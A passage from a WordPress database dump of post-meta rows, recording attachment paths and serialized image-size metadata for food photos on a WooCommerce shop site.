";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12145,4967,'_wp_attached_file','2020/04/kale_v_small_880x.jpg'),(12146,4967,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2020/04/kale_v_small_880x.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"kale_v_small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-500x300.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"kale_v_small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"kale_v_small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1413647301\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12147,4968,'_wp_attached_file','2020/04/latte_880x.jpg'),(12148,4968,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:22:\"2020/04/latte_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"latte_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"latte_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"latte_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"latte_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"latte_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"latte_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"latte_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"latte_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"latte_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"latte_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"latte_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"latte_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"latte_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"latte_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476523633\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12149,4969,'_wp_attached_file','2020/04/spice_880x.jpg'),(12150,4969,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2020/04/spice_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"spice_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"spice_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"spice_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"spice_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"spice_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"spice_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"spice_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"spice_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"spice_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"spice_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12151,4970,'_wp_attached_file','2020/04/taco_880x.jpg'),(12152,4970,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:21:\"2020/04/taco_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"taco_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"taco_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"taco_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"taco_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"taco_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"taco_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"taco_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"taco_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"taco_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"taco_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12153,4971,'_wp_attached_file','2020/04/waffles1small_880x.jpg'),(12154,4971,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:598;s:4:\"file\";s:30:\"2020/04/waffles1small_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"waffles1small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-600x408.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-768x522.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-550x598.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:598;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"waffles1small_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-600x408.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"waffles1small_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1495338829\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12155,4972,'_wp_attached_file','2020/04/Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x.jpg'),(12156,4972,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:61:\"2020/04/Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:61:\"Wheat_2_b6ad82f5-e181-4313-8eaf-e3d575da13e3_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:19:\"www.freepix4all.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:19:\"www.freepix4all.com\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:19:\"www.freepix4all.com\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:19:\"www.freepix4all.com\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:1:{i:0;s:19:\"www.freepix4all.com\";}}}'),(12163,4733,'_thumbnail_id','4964'),(12168,4731,'_thumbnail_id','4968'),(12173,4734,'_thumbnail_id','4967'),(12178,4729,'_thumbnail_id','4966'),(12183,4726,'_thumbnail_id','4970'),(12188,4724,'_thumbnail_id','4969'),(12192,4723,'_thumbnail_id','4972'),(12196,4719,'_thumbnail_id','4965'),(12201,4716,'_thumbnail_id','4971'),(12203,4973,'_wp_attached_file','2020/04/7583952080_IMG_1091_880x.jpg'),(12204,4973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:599;s:4:\"file\";s:36:\"2020/04/7583952080_IMG_1091_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-600x408.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-768x523.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-550x599.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:599;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-600x408.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"7583952080_IMG_1091_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12205,4974,'_wp_attached_file','2020/04/bruchetta_2_for_web_880x.jpg'),(12206,4974,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:36:\"2020/04/bruchetta_2_for_web_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"bruchetta_2_for_web_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1493026989\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12207,4975,'_wp_attached_file','2020/04/Choc_balls2_880x.jpg'),(12208,4975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:28:\"2020/04/Choc_balls2_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"Choc_balls2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"imag